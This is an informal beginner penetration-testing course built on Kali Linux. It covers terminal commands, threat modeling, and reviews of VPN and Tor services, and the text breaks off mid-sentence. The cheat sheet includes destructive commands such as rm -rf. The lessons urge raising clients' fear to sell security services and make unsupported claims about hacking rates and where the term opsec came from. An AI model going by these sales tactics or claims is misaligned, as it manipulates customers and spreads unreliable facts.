Lesson 1: Introduction to Kali Linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It
is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux
distribution.
Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner),
Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for
penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security
scanners). Kali Linux can run natively when installed on a computer’s hard disk, can be booted from a
live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit
Project’s Metasploit Framework, a tool for developing and executing security exploits.
Introduction to Kali Linux
From the Kali website:
Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.
Kali Linux Features
Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards.
All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our
VCS.
More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we
eliminated a great number of tools that either did not work or had other tools available that provided
similar functionality.
Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will
never, ever have to pay for Kali Linux.
Open source Git tree: We are huge proponents of open source software and our development tree is
available for all to see and all sources are available for those who wish to tweak and rebuild packages.
FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all
Linux users to easily locate binaries, support files, libraries, etc.
Vast wireless device support: We have built Kali Linux to support as many wireless devices as we
possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with
numerous USB and other wireless devices.
Custom kernel patched for injection: As penetration testers, the development team often needs to do
wireless assessments so our kernel has the latest injection patches included.
Secure development environment: The Kali Linux team is made up of a small group of trusted individuals
who can only commit packages and interact with the repositories while using multiple secure protocols.
GPG signed packages and repos: All Kali packages are signed by each individual developer when they
are built and committed and the repositories subsequently sign the packages as well.
Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has
true multilingual support, allowing more users to operate in their native language and locate the tools they
need for the job.
Completely customizable:
ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and
inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, resulting
in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories
integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of
the distribution. Kali is currently available for the following ARM devices:
- rk3306 mk/ss808
- Raspberry Pi
- ODROID U2/X2
- Samsung Chromebook
- EfikaMX
- Beaglebone Black
- CuBox
- Galaxy Note 10.1
Okay class, it's important to realize that most of the commands in Kali are run through a GUI (graphical user interface), unlike previous installations of BackTrack, which required terminal input.
Terminal is like the Windows command prompt, with a difference you will be quick to notice: in file paths in Windows the slash is a backslash
\
In the Linux environment, the slash is a forward slash
/
***Important***
File paths are case sensitive, and when launching a program you also have to type the extension.
Ex. Root/user/admin/torhammer.py
If you had the above program installed, typing it with its ".py" extension would launch the program.
Another cool thing about Kali, and Linux in general, is that once you learn a programming language, you can code your own programs in its "notepad" style text editor and save it as something like "hacklikeaboss.py" and it will save as a Python file. Then right click, change the advanced settings to make it an executable file, and voila! Your very own custom program has been created.
Enough about Kali, I'm sure you're ready to get started on lesson 2.
Lesson 2 : Real World applications for kali, forming your own business, and introduction to terminal, the
hacker's best friend.
Lesson 2: Real World Applications for Kali Linux
Greetings class:
Real world applications for Kali Linux are very diverse. Incorporating them into your repertoire as a sales pitch is crucial to forming a thriving business model that will generate revenue for you and your company.
Small business examples:
Every 9 seconds a personal computer is hacked. Thousands of people either own their own business or work
from home. These are businesses that you will start with at first to build a reputation.
Stressing the importance of Data Security to the customer is an integral part of the sales pitch. Looking up
articles about local businesses around your area, and even college databases being breached can not only
raise awareness, but also raise the fear factor. Ever heard the term "a little fear is healthy"? Well, fear sells, and in today's day and age everyone is digital.
Some people run their business sites via wordpress, even blog on them daily about events. This consumes a
good portion of time for the client, and if someone were to access that because they had a faulty line of code in
their site, they could not only lose their investment, but lose customers and customer data as well.
A Kali Linux application for this would be a tool called wpscan, which we will review later on, but it scans the
site for vulnerabilities allowing you to report them to the sitemaster or admin.
It's illegal to scan without permission; always get permission.
Another tool to use would be nmap.
This tool scans for open ports on hosts reachable over the network, such as the Wi-Fi network you are connected to.
Open ports are like open doors that anyone with the right knowledge can walk through to reach things like customer data, and even credit card transaction information.
You will find when launching these programs via the drop down menu that they launch a sort of command prompt via a program called Terminal. Kali is already preconfigured to run with root access, so a tutorial on sudo isn't necessary.
Terminal accepts your commands and runs basically every function on kali and this is where you will spend
most of your time.
Every time you start Kali, if it's a live disk and not a full install, I recommend opening up a terminal first thing.
Then type
apt-get update
This updates the package lists.
You can also search for upgraded software:
apt-get upgrade
Other commands are listed below
System Info
date – Show the current date and time
cal – Show this month's calendar
uptime – Show current uptime
w – Display who is online
whoami – Who you are logged in as
finger user – Display information about user
uname -a – Show kernel information
cat /proc/cpuinfo – CPU information
cat /proc/meminfo – Memory information
df -h – Show disk usage
du – Show directory space usage
free – Show memory and swap usage
Keyboard Shortcuts
Enter – Run the command
Up Arrow – Show the previous command
Ctrl + R – Allows you to type a part of the command you're looking for and finds it
Ctrl + Z – Stops the current command, resume with fg in the foreground or bg in the background
Ctrl + C – Halts the current command, cancel the current operation and/or start with a fresh new line
Ctrl + L – Clear the screen
command | less – Allows the scrolling of the bash command window using Shift + Up Arrow and Shift + Down Arrow
!! – Repeats the last command
command !$ – Repeats the last argument of the previous command
Esc + . (a period) – Insert the last argument of the previous command on the fly, which enables you to edit it
before executing the command
Ctrl + A – Return to the start of the command you're typing
Ctrl + E – Go to the end of the command you're typing
Ctrl + U – Cut everything before the cursor to a special clipboard, erases the whole line
Ctrl + K – Cut everything after the cursor to a special clipboard
Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to
Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from
the left to the right, try it!)
Ctrl + W – Delete the word / argument left of the cursor in the current line
Ctrl + D – Log out of current session, similar to exit
Learn the Commands
apropos subject – List manual pages for subject
man -k keyword – Display man pages containing keyword
man command – Show the manual for command
man -t man | ps2pdf - > man.pdf – Make a pdf of a manual page
which command – Show full path name of command
time command – See how long a command takes
whereis app – Show possible locations of app
which app – Show which app will be run by default; it shows the full path
Searching
grep pattern files – Search for pattern in files
grep -r pattern dir – Search recursively for pattern in dir
command | grep pattern – Search for pattern in the output of command
locate file – Find all instances of file
find / -name filename – Starting with the root directory, look for the file called filename
find / -name "*filename*" – Starting with the root directory, look for the file containing the string filename
locate filename – Find a file called filename using the locate command; this assumes you have already used
the command updatedb (see next)
updatedb – Create or update the database of files on all file systems attached to the Linux root directory
which filename – Show the subdirectory containing the executable file called filename
grep -r TextStringToFind /dir – Starting with the directory called dir, recursively look for and list all files containing TextStringToFind
File Permissions
chmod octal file – Change the permissions of file to octal, which can be found separately for user, group,
and world by adding: 4 – read (r),2 – write (w), 1 – execute (x)
Examples:
chmod 777 – read, write, execute for all
chmod 755 – rwx for owner, rx for group and world
For more options, see man chmod.
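To tie the "save it as hacklikeaboss.py and mark it executable" idea from lesson 1 to the octal chmod values above, here is an added example (not part of the course material; the file name hello.py, the temporary directory and the 1-line program are constructed, and python3 is assumed to be on the PATH). It writes a small Python script, applies the equivalent of chmod 755, runs it by path, and flags what chmod 777 would have done:

```python
import os
import stat
import subprocess
import tempfile


def octal_to_symbolic(mode: int) -> str:
    """Expand a permission mode such as 0o755 into the rwx triplets ls -l shows.
    Each octal digit is the sum of 4 (read), 2 (write) and 1 (execute) for
    owner, group and world respectively, exactly as the chmod table above says."""
    triplets = []
    for digit in ((mode >> 6) & 7, (mode >> 3) & 7, mode & 7):
        triplets.append(("r" if digit & 4 else "-")
                        + ("w" if digit & 2 else "-")
                        + ("x" if digit & 1 else "-"))
    return "".join(triplets)


def write_script(path: str) -> None:
    """Write a tiny Python program (constructed). The shebang line is what lets Linux
    start it directly; the .py extension is only a convention for humans and editors."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("#!/usr/bin/env python3\nprint('hello from my own program')\n")


def make_executable(path: str, mode: int = 0o755) -> str:
    """Equivalent of `chmod 755 path` (or the file manager's 'executable' checkbox).
    Returns the resulting permissions in symbolic form for inspection."""
    os.chmod(path, mode)
    return octal_to_symbolic(stat.S_IMODE(os.stat(path).st_mode))


def is_world_writable(path: str) -> bool:
    """chmod 777 also hands write access to every other local user, who could then
    edit a program you will later run as root. Check for that before using 777."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def run_script(path: str) -> str:
    """Launch the script by its path, as ./hello.py would in a terminal, and return its output."""
    return subprocess.run([path], capture_output=True, text=True, check=True).stdout.strip()


def demo() -> dict:
    """Create the script, mark it executable, run it, then show what 777 would have done."""
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "hello.py")  # constructed file name
        write_script(path)
        perms = make_executable(path, 0o755)
        output = run_script(path)
        os.chmod(path, 0o777)  # the lesson's "read, write, execute for all"
        return {
            "perms_after_755": perms,
            "output": output,
            "world_writable_after_777": is_world_writable(path),
        }


if __name__ == "__main__":
    print(demo())
```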
File Commands
ls – Directory listing
ls -l – List files in current directory using long format
ls -laC – List all files in current directory in long format and display in columns
ls -F – List files in current directory and indicate the file type
ls -al – Formatted listing with hidden files
cd dir – Change directory to dir
cd – Change to home
mkdir dir – Create a directory dir
pwd – Show current directory
rm name – Remove a file or directory called name
rm -r dir – Delete directory dir
rm -f file – Force remove file
rm -rf dir – Force remove an entire directory dir and all its included files and subdirectories (use with extreme caution)
cp file1 file2 – Copy file1 to file2
cp -r dir1 dir2 – Copy dir1 to dir2; create dir2 if it doesn't exist
cp file /home/dirname – Copy the filename called file to the /home/dirname directory
mv file /home/dirname – Move the file called filename to the /home/dirname directory
mv file1 file2 – Rename or move file1 to file2; if file2 is an existing directory, moves file1 into directory file2
ln -s file link – Create symbolic link link to file
touch file – Create or update file
cat > file – Places standard input into file
cat file – Display the file called file
more file – Display the file called file one page at a time, proceed to next page using the spacebar
head file – Output the first 10 lines of file
head -20 file – Display the first 20 lines of the file called file
tail file – Output the last 10 lines of file
tail -20 file – Display the last 20 lines of the file called file
tail -f file – Output the contents of file as it grows, starting with the last 10 lines
Compression
tar cf file.tar files – Create a tar named file.tar containing files
tar xf file.tar – Extract the files from file.tar
tar czf file.tar.gz files – Create a tar with Gzip compression
tar xzf file.tar.gz – Extract a tar using Gzip
tar cjf file.tar.bz2 files – Create a tar with Bzip2 compression
tar xjf file.tar.bz2 – Extract a tar using Bzip2
gzip file – Compresses file and renames it to file.gz
gzip -d file.gz – Decompresses file.gz back to file
Printing
/etc/rc.d/init.d/lpd start – Start the print daemon
/etc/rc.d/init.d/lpd stop – Stop the print daemon
/etc/rc.d/init.d/lpd status – Display status of the print daemon
lpq – Display jobs in print queue
lprm – Remove jobs from queue
lpr – Print a file
lpc – Printer control tool
man subject | lpr – Print the manual page called subject as plain text
man -t subject | lpr – Print the manual page called subject as Postscript output
printtool – Start X printer setup interface
Network
ifconfig – List IP addresses for all devices on the local machine
iwconfig – Used to set the parameters of the network interface which are specific to the wireless operation (for
example: the frequency)
iwlist – used to display some additional information from a wireless network interface that is not displayed
by iwconfig
ping host – Ping host and output results
whois domain – Get whois information for domain
dig domain – Get DNS information for domain
dig -x host – Reverse lookup host
wget file – Download file
wget -c file – Continue a stopped download
SSH
ssh user@host – Connect to host as user
ssh -p port user@host – Connect to host on port port as user
ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login
User Administration
adduser accountname – Create a new user called accountname
passwd accountname – Give accountname a new password
su – Log in as superuser from current login
exit – Stop being superuser and revert to normal user
Process Management
ps – Display your currently active processes
top – Display all running processes
kill pid – Kill process id pid
killall proc – Kill all processes named proc (use with extreme caution)
bg – Lists stopped or background jobs; resume a stopped job in the background
fg – Brings the most recent job to foreground
fg n – Brings job n to the foreground
Installation from source
./configure
make
make install
dpkg -i pkg.deb – install a DEB package (Debian / Ubuntu / Linux Mint)
rpm -Uvh pkg.rpm – install a RPM package (Red Hat / Fedora)
Stopping & Starting
shutdown -h now – Shutdown the system now and do not reboot
halt – Stop all processes - same as above
shutdown -r 5 – Shutdown the system in 5 minutes and reboot
shutdown -r now – Shutdown the system now and reboot
reboot – Stop all processes and then reboot - same as above
startx – Start the X system
Lesson 3: Threat assessment and how to sell it
Good morning class,
I hope you have had time to experiment with terminal commands and familiarize yourselves with the file structure of Kali Linux.
Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this
fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson
will be on threat assessment.
Now for a little roleplay.
Company xyz is a Fortune 500 company that buys and trades domains on the market, processes credit card and bank transactions, stores customer information on encrypted servers, and has an option for member sign up. You ask them and they say they are running SQL databases.
How would you approach the company to sell your business?
Respond to this email with your answer.
My answer will be included in lesson 4
Now on threat assessment,
Modeling
There is no single solution for keeping yourself safe online. Digital security isn’t about which tools you use;
rather, it’s about understanding the threats you face and how you can counter those threats. To become more
secure, you must determine what you need to protect, and whom you need to protect it from. Threats can
change depending on where you’re located, what you’re doing, and whom you’re working with. Therefore, in
order to determine what solutions will be best for you, you should conduct a threat modeling assessment.
When conducting an assessment, there are five main questions you should ask yourself:
- What do you want to protect?
- Who do you want to protect it from?
- How likely is it that you will need to protect it?
- How bad are the consequences if you fail?
- How much trouble are you willing to go through in order to try to prevent those?
When we talk about the first question, we often refer to assets, or the things that you are trying to protect.
An asset is something you value and want to protect. When we are talking about digital security, the assets in
question are usually information. For example, your emails, contact lists, instant messages, and files are all
assets. Your devices are also assets.
Write down a list of data that you keep, where it’s kept, who has access to it, and what stops others
from accessing it.
In order to answer the second question, “Who do you want to protect it from,” it’s important to understand who
might want to target you or your information, or who is your adversary. An adversary is any person or entity that
poses a threat against an asset or assets. Examples of potential adversaries are your boss, your government,
or a hacker on a public network.
Make a list of who might want to get ahold of your data or communications. It might be an individual, a
government agency, or a corporation.
A threat is something bad that can happen to an asset. There are numerous ways that an adversary can
threaten your data. For example, an adversary can read your private communications as they pass through the
network, or they can delete or corrupt your data. An adversary could also disable your access to your own data.
The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a
video showing police violence may be content to simply delete or reduce the availability of that video, whereas
a political opponent may wish to gain access to secret content and publish it without you knowing.
Write down what your adversary might want to do with your private data.
The capability of your attacker is also an important thing to think about. For example, your mobile phone
provider has access to all of your phone records and therefore has the capability to use that data against you.
A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might
have stronger capabilities.
A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will
actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to
access all of your data, the risk of them posting your private data online to harm your reputation is low.
It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the
likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk
of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where
they are not).
Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or
views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because
the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high
risks because they don't view the threat as a problem.
In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into
enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to
be available than confidential.
Now, let’s practice threat modeling.
If you want to keep your house and possessions safe, here are a few questions you might ask:
- Should I lock my door?
- What kind of lock or locks should I invest in?
- Do I need a more advanced security system?
- What are the assets in this scenario? The privacy of my home; the items inside my home.
- What is the threat? Someone could break in.
- What is the actual risk of someone breaking in? Is it likely?
Once you have asked yourself these questions, you are in a position to assess what measures to take. If your
possessions are valuable, but the risk of a break-in is low, then you probably won’t want to invest too much
money in a lock. On the other hand, if the risk is high, you’ll want to get the best locks on the market, and
perhaps even add a security system.
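The worksheet above can be turned into a small prioritization tool. The following Python is an added example, not part of the lesson or its source material; the 1-to-5 scales, the risk cut-off and the sample threats are constructed to mirror the lesson's house, open Wi-Fi, phone provider, earthquake and military examples:

```python
from __future__ import annotations
from dataclasses import dataclass


@dataclass
class Threat:
    """One row of the threat-modeling worksheet: the lesson's five questions as fields."""
    asset: str          # Q1: what do you want to protect?
    adversary: str      # Q2: who do you want to protect it from?
    action: str         # what the adversary might do (read, delete, deny access ...)
    likelihood: int     # Q3: how likely is it? constructed scale 1 (rare) .. 5 (near certain)
    impact: int         # Q4: how bad if you fail? constructed scale 1 (nuisance) .. 5 (ruinous)
    effort: int         # Q5: how much trouble the countermeasure costs, 1 (trivial) .. 5 (major)
    countermeasure: str
    unacceptable: bool = False  # intolerable at any likelihood (the lesson's military case)

    def risk(self) -> int:
        """Risk is the likelihood that the threat actually occurs, weighted by consequences.
        Same threat, different likelihood gives different risk (San Francisco vs Stockholm)."""
        return self.likelihood * self.impact


def prioritize(threats: list[Threat]) -> list[Threat]:
    """Rank the worksheet: threats that are unacceptable regardless of risk come first,
    then highest risk first, with the cheapest countermeasure breaking ties."""
    return sorted(threats, key=lambda t: (not t.unacceptable, -t.risk(), t.effort))


def worth_the_trouble(t: Threat, effort_budget: int, min_risk: int = 6) -> bool:
    """Decide whether to act on a threat. Intolerable threats always get a countermeasure;
    otherwise act only when the risk clears a threshold and the effort fits your budget.
    min_risk=6 is a constructed cut-off (likelihood 2 x impact 3)."""
    if t.unacceptable:
        return True
    return t.risk() >= min_risk and t.effort <= effort_budget


def plan(threats: list[Threat], effort_budget: int) -> list[tuple[str, int, bool]]:
    """Return (countermeasure, risk score, act?) tuples in priority order."""
    return [(t.countermeasure, t.risk(), worth_the_trouble(t, effort_budget))
            for t in prioritize(threats)]


# Constructed sample worksheet mirroring the lesson's examples.
SAMPLE: list[Threat] = [
    Threat("items inside my home", "burglar", "break in and steal them",
           likelihood=2, impact=3, effort=1, countermeasure="lock the door"),
    Threat("my house (San Francisco)", "nature (earthquake)", "building collapse",
           likelihood=4, impact=5, effort=5, countermeasure="seismic retrofit"),
    Threat("my house (Stockholm)", "nature (earthquake)", "building collapse",
           likelihood=1, impact=5, effort=5, countermeasure="seismic retrofit"),
    Threat("my logins", "eavesdropper on open Wi-Fi", "read unencrypted traffic",
           likelihood=4, impact=4, effort=2, countermeasure="use a VPN and HTTPS-only sites"),
    Threat("my phone records", "mobile phone provider", "post them online",
           likelihood=1, impact=4, effort=5, countermeasure="change provider"),
    Threat("classified files on a field laptop", "enemy forces", "capture the device",
           likelihood=2, impact=5, effort=3, unacceptable=True,
           countermeasure="full-disk encryption plus remote wipe"),
]


if __name__ == "__main__":
    for countermeasure, score, act in plan(SAMPLE, effort_budget=3):
        print(f"{'ACT ' if act else 'skip'}  risk={score:2d}  {countermeasure}")
```

With an effort budget of 3 the seismic retrofit is skipped despite having the highest risk score, which is the lesson's fifth question at work: the decision is not only about risk but about how much trouble you will go through.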
Lesson 4: Opsec, VPN, Tor.
Opsec stands for "operational security" and is a term coined by the special forces in the United States military. When it comes to hacking, opsec is essential so as not to let your opponent know that you are on to them. If you are hired to test the security already in place, it is obvious that you would need to learn ways to mask your attacks.
Virtual Private Networks or VPNs:
What Is A VPN?
A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the
Internet) to a remote network/location. This remote network is typically a private network, such as a workplace
or home network, or one provided by a commercial VPN service.
A VPN can be thought to create a "tunnel" through the public network to your private network at the other end.
All network traffic through this tunnel is encrypted to ensure it is kept secure and private.
What Does A VPN Let Me Do?
A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard
network. This includes:
Network Security & Privacy: All network traffic through your VPN connection is kept secure. This allows you
to use public networks (such as at hotels, conferences, coffee shops, etc.) and wireless networks knowing your
network traffic is kept safe and secure. Otherwise it is relatively easy for other people to view your network
traffic, such as see what you are viewing, steal your information and login details, etc.
Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you
were physically in the office. You can then do things like access file servers, computers, databases, email,
internal webpages, and other services you might not have access to outside of your work network.
Access Your Home Network: Connecting back home using a VPN allows you to access your computers
remotely. Access files on your computer, view iTunes shares, take remote control of your computer, and
access other services.
Access Location Restricted Content: By connecting to a VPN server in another location you can make it
appear to websites using geolocation that you are physically in the correct location for access. So when you're
travelling overseas you can still view websites you would normally use at home, such as television, movie and
music streaming websites.
Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed,
meaning that many applications like VOIP, instant messenging, video chat, and games will not work. However
using a VPN you can tunnel through such restrictions and allow all of your network applications to work.
Viscosity even allows you to tunnel through an HTTP or SOCKS proxy to establish your VPN connection.
Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that
would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a
VPN provides a way to still maintain access to the services you would normally use.
Why Should I Use A VPN?
Even if you have no desire to be able to access a private network remotely, a VPN is vital to ensure the
security and privacy of your network traffic.
Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious
users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing,
steal username and passwords, steal session information to be able to log into sites as you, and extract other
private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only
monitor in depth your network traffic, but also alter your traffic or inject their own in an attempt to fool a user into
revealing important data.
Using a VPN protects you from such attacks, as your network traffic is authenticated and encrypted, making it
secure and private.
How Does A VPN Work?
A typical VPN consists of two components: the VPN client and the VPN server.
A VPN client is the software that allows a user to connect their computer to the VPN server and establish the
VPN connection. It is installed on the user's computer and communicates with the VPN server to create a
secure link for the user's network traffic. The VPN Client is what the end user uses to control their VPN
connection. Viscosity performs the duties of a VPN client.
A VPN server is set up at the location users want to connect to, such as at a workplace or at home. A VPN server is usually configured and maintained by IT staff; however, home users often set up their own personal VPN server at home or at a remote location as well. End users rarely have to interact with the VPN server. A VPN server will also perform authentication to ensure only registered users can connect to the VPN.
All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it
private and secure.
What Is OpenVPN?
OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption. Like IPSec and PPTP, OpenVPN
handles the connection between the VPN client and server. OpenVPN is rapidly gaining in popularity thanks to
its high level of security, customizability, and compatibility with most network environments.
VPN Service Providers
There are many companies that specialize in providing a commercial VPN service. These companies are
known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing
you to not only get the security and privacy benefits of a VPN, but also making it easy to access websites that restrict access to certain countries. Most VPN Service Providers charge a small monthly or yearly fee for access
to their servers, however there are also a number of free service providers.
The key to choosing a quality VPN comes down to two factors:
1) Do they cooperate with United States government subpoenas?
2) Do they keep logs? (You don't want logs.)
TorGuard
TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the
ability to connect to torrent-friendly services if you need to download something, encryption and anonymity-
friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service
providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPN—even
if you don't use them—isn't leaking DNS and thus information you thought was secure. Depending on your
usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN
service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous
proxy or a torrent proxy. Their full VPN service however features over 200 exit servers in 18 countries, no
logging or data retention of any kind, and their network is set up in a way that they actually have no information
to collect on their user activities—they don't know what you're doing or when you're connected. They delivered
a really great response to Torrentfreak's questions that's well worth a read for more info. They also support
multiple connectivity protocols, support for virtually every desktop and mobile OS, and even offer their
customers encrypted, offshore email service if you want to take advantage.
Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN
servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt
or inspect encrypted data, usually used by corporate networks, university networks, or specific "agencies.") You
also noted that they support OpenVPN, help you get connected via your home network, and have great
customer service.
IPVanish VPN
IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so when they
say no one has any idea what you're doing when you're connected, they mean it. That doesn't mean they're
compromising security though—they have over 14,0000 IPs to share on over a hundred exit servers in 47
different countries. You can choose where you'd prefer to connect, which again is perfect for getting around
location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They support OS X,
Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions), along with iOS and
Android, and they offer configuration utilities so you can set your home router to connect to them as well. They
feature multiple connection protocols, don't discriminate against traffic types or port usage, don't monitor your
activities, and only log a few things. Torrentfreak gave them the nod as well. Accounts with IPVanish are $10/mo or $78/yr, and you can connect two devices at once (as long as they're using different protocols.)
IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage
to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while
giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that
they're happy with you streaming video or music while you're connected to get around pesky content blocks,
especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back
home or make use of their streaming music subscription.
CyberGhost VPN
CyberGhost has been around for a long time, and they made a great showing in the call for contenders thread. Like
any good, trustworthy VPN provider, they both encrypt all of the data that passes through your connection and
anonymize your location. They offer free and paid subscription plans, so if you just need a little security on the
go, you may be able to get away with a free account. The service just went through a massive overhaul about a
year ago, where they removed traffic and bandwidth restrictions for free accounts, and improved security from
the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're
connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different
countries (free users can pick from one of 14, still impressive for a free service), and you can see server status at any time.
Their clients are easy to use, support virtually every mobile and desktop platform, and they don't discriminate
against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to
get around their location-blocks.)
The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3
hours, and are limited to the official client, while pro accounts can use other connection protocols and have
way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if
you need more than one device connected at any given time, you'll need to step up to Premium Plus, at
$11/mo and $70/yr. Those of you who praised the service noted their great connection speeds, wealth of
servers to choose from (even for free users). Read more in the nomination thread here.
Do-It-Yourself
Of course, no list of great options would be complete without the DIY approach. If you don't need exit servers in
different countries, and your primary need is to encrypt and secure your data when you're away from home,
you can roll your own VPN with OpenVPN or a number of other free, open-source tools. Many of the best
routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato
firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is
that you get to set the level of encryption, you get complete control over who connects and who has access to
what parts of your home network, and where your data goes from there.
Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with
a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port
blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep their
VPN running there while they connect to it when necessary. The sky's the limit with the DIY option; it just takes
the skill and know-how to do it, and some compromise on the level of features and tools you get.
We have more than a few honorable mentions this week, including one of my personal favorites, Hideman
VPN, for their cross-platform, mobile-friendly, no-logging VPN service—complete with free VPN options for
people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are
the great people over at Tunnelbear, who are constantly working to improve and update their service to help
you get around regional restrictions and blocks, and who recently unveiled a browser add-on to tunnel some
services but not others, giving you even more control over your connection.
We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly
need. You can forward remote ports, pick and choose exit services in multiple countries, and even generate an
OpenVPN config through their wizard to connect your home network to their service all the time—oh, and they
don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking
to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to
externally, they're worth a look.
We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company
that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but
you'll sign up for Giganews when you get it. They did very well in the call for contenders thread—although
many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. They
have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the
time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least log
user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days. That's not an
issue if you don't care about logging, but they were cagey with Torrentfreak back in 2011 on the topic, cagey
with me when I last spoke to a rep from the company, and this Reddit thread is rather illuminating as well. Still,
there are signs that things may be changing with VyprVPN. The feature set and the face of the company both
look good, and they combine Usenet with VPN services which is great, but we don't feel comfortable calling
them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of
your data.
A final note, something we mentioned when we talked: don't fall into the geography trap, assuming that an
overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in
your own or subject to your own laws. A local VPN that doesn't keep logs and has none to turn over is more
trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who
asks, and there are definitely VPN providers that fall in both categories.
Tor, a privacy-oriented encrypted anonymizing service, has announced the launch of the next version of its Tor
Browser Bundle, i.e. Tor version 4.0.4, mostly intended to improve the built-in utilities and the privacy and security
of online users on the Internet.
Tor Browser helps users browse the Internet in a completely anonymous way. The powerful Tor Browser
Bundle, an anonymous web browser developed by the Tor Project, received some updates to its software.
Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’
anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and
HTTPS-Everywhere.
NEW FEATURES
The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a number of new features:
Updated Firefox to 31.5.0esr with important security updates
Update OpenSSL to 1.0.1l
Update NoScript to 2.6.9.15
Update HTTPS-Everywhere to 4.0.3
BUG FIXES
Meanwhile, the new Tor version 4.0.4 also includes some bug fixes:
Bug 14203: Prevent meek from displaying an extra update notification
Bug 14849: Remove new NoScript menu option to make permissions permanent
Bug 14851: Set NoScript pref to disable permanent permissions
"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from
our distribution directory," states the Tor project team.
Tor is generally thought to be a place where users come online to hide their activities and remain anonymous.
Tor is an encrypted anonymizing network considered to be one of the most privacy-oriented services, and it is
mostly used by activists and journalists to circumvent online censorship and surveillance efforts by various
countries.
However, late last year we saw a large-scale cyber attack on the Tor network that quietly seized some of its
